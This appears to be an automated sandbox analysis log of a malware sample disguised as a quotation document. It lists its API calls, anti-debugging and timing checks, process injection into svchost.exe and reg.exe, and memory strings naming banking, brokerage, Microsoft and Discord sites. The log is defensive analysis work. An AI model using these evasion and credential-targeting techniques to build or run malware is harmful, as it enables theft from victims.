                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032CC640 FindFirstFileW,FindNextFileW,FindClose,3_2_032CC640
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0
                Source: r44a7072.3.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: r44a7072.3.drBinary or memory string: global block list test formVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: r44a7072.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: r44a7072.3.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: r44a7072.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: reg.exe, 00000003.00000002.3410869469.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412037435.0000000001269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: r44a7072.3.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: r44a7072.3.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: firefox.exe, 0000000D.00000002.1400427585.0000016DBA0CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV^
                Source: r44a7072.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: r44a7072.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: r44a7072.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: r44a7072.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: r44a7072.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: r44a7072.3.drBinary or memory string: discord.comVMware20,11696497155f
                Source: r44a7072.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: r44a7072.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: r44a7072.3.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: r44a7072.3.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: r44a7072.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: r44a7072.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: r44a7072.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037021AE rdtsc 1_2_037021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417973 LdrLoadDll,1_2_00417973
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C83F09 BlockInput,0_2_00C83F09
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C45A7C
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E633E0 mov eax, dword ptr fs:[00000030h]0_2_00E633E0
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E63380 mov eax, dword ptr fs:[00000030h]0_2_00E63380
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E61D20 mov eax, dword ptr fs:[00000030h]0_2_00E61D20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037021AE mov eax, dword ptr fs:[00000030h]1_2_037021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
